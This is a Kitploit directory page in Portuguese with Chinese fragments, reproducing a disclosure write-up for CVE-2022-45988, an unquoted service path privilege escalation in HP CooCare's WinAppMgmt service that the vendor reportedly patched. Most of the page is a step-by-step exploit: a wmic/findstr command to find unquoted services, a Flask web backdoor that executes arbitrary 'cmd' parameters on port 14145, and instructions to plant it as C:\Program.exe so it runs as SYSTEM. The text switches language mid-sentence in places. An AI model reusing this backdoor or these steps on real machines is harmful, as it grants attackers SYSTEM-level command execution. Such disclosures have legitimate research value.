Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-45988 — CVE-2022-45988 StarSoftComm HP CooCare Existe uma vulnerabilidade de elevação de privilégio | Kitploit
Ferramentas/GitHubGitHub/happy0717/cve-2022-45988
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoExploração de Binários
GitHubhappy0717/cve-2022-45988

CVE-2022-45988

CVE-2022-45988 StarSoftComm HP CooCare Existe uma vulnerabilidade de elevação de privilégio

Ver Repositório
3há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-45988 StarSoftComm HP CooCare Existe uma vulnerabilidade de elevação de privilégio

####################################################

Eu entrei em contato com hp-security-alert. Eles corrigiram este bug. Sobre StarSoftComm CooCare [HP-PSRT-IR #4106] image O fornecedor respondeu com as seguintes informações:

Siga estes passos para atualizar:

  1. Inicie o eService
  2. Aguarde cerca de 3 minutos
  3. Feche e inicie o eService novamente.
  4. Verifique se a versão é v5.364 ou posterior.

#####################################

Existe uma vulnerabilidade de elevação de privilégio no StarSoftComm HP CooCare que poderia permitir que um atacante eleve seu nível de privilégio e管家超级版是HP星14 pro 自带的一款远程诊断软件,该软件为StarSoftComm(软通科技)旗下产品

test on windows 11 22621.819 HP LAPTOP HP Pavilion Plus 14 英寸笔记本电脑 14-eh0000 (56D77AV)

Versão afetada: CooCare abaixo de v5.364

#Reprodução da vulnerabilidade

#O primeiro passo: wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\" |findstr /i /v """ encontre o serviço (使用上述CMD命令找到未引用的服务)

image

O nome do serviço é Windows Application Management Service = também conhecido como = WinAppMgmt
服务的名称叫做Windows Application Management Service 简称是WinAppMgmt

image

O serviço é da StarSoftComm CooCare

image

#Passo 2: Prepare um programa malicioso

image

root@kitploit:~
from flask import Flask, request
import os

app = Flask(__name__)

@app.route('/')
def hello_world():
    r = request.args.getlist('cmd')  #Reception? cmd= parameter
    a=os.popen(r[0])  #Execute system commands
    l = a.read()
    return l  #return

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=14145, debug=True)  #Listen HTTP port 14145

Eu estava usando python3 flask para escrever um exe malicioso. Ele pode escutar na porta HTTP 14145 e executar comandos do sistema.

Usando os comandos pyinstaller.exe --onefile --windowed -F -w python_test.py para fazer um exe malicioso.

#Passo 3: Coloque o malware no caminho C:\ e renomeie o malware para Program.exe

image

#Passo 4: Inicie o Windows Application Management Service

Se o Windows Application Management Service já estiver iniciado, você pode reiniciá-lo

image

#Passo 5: Aguarde o Windows Application Management Service iniciar e execute os comandos do sistema C:\Program.exe executa como sistema

Quando vejo o Windows Application Management Service iniciar no Taskmgr.exe com SYSTEM, então posso abrir o navegador e inserir http://127.0.0.1:14145?cmd=whoami

Aguarde..........

por...

ele.

NT SYSTEM

image

Baixar ferramenta